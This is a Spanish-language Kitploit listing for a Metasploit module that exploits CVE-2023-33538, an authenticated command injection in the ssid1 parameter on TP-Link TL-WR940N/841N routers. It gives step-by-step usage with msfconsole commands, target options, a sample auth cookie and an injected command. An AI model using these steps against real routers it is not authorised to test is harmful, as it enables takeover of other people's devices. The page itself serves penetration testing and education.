Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-33538-msf — CVE-2023-33538 - Módulo Ruby de Inyección de Comandos en TP-Link para Metasploit Framework | Kitploit
Herramientas/GitHubGitHub/mrowkoob/cve-2023-33538-msf
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubmrowkoob/cve-2023-33538-msf

CVE-2023-33538-msf

CVE-2023-33538 - Módulo Ruby de Inyección de Comandos en TP-Link para Metasploit Framework

Ver Repositorio
114hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-33538 – Inyección de Comandos en TP-Link TL-WR940N/841N (módulo de Metasploit)

Este módulo auxiliar de Metasploit apunta a una vulnerabilidad de inyección de comandos autenticada en los routers TP-Link TL-WR940N V2/V4 y TL-WR841N V8/V10.
El problema radica en el parámetro vulnerable ssid1 utilizado en WlanNetworkRpm.htm, que permite la inyección de comandos arbitrarios de shell.

Si tiene éxito, permite al atacante ejecutar comandos arbitrarios en el dispositivo.

Más información sobre el CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538


¿Cómo ejecutar este módulo?

  1. Copia el archivo .rb en tu carpeta de módulos de Metasploit, por ejemplo:
root@kitploit:~
cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
  1. Inicia la consola de Metasploit:
root@kitploit:~
msfconsole
  1. Busca y usa el módulo:
root@kitploit:~
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
  1. Establece las opciones requeridas:
root@kitploit:~
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run

El módulo no realiza la autenticación. Debes extraer manualmente la cookie Authorization y el prefijo de sesión de un inicio de sesión exitoso en la interfaz web del router.


Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2023-33538
  • https://web.archive.org/web/20230609111043/https://github.com/a101e-IoTvul/iotvul/blob/main/tp-link/3/TL-WR940N_TL-WR841N_userRpm_WlanNetworkRpm_Command_Injection.md

Descargo de responsabilidad

Este módulo está destinado únicamente con fines educativos.
No utilices este código contra dispositivos o infraestructuras que no poseas o para los que no tengas permiso explícito de prueba.


Problemas

Si encuentras errores o tienes ideas para mejoras, no dudes en abrir un issue o dejar un comentario.

Descargar herramienta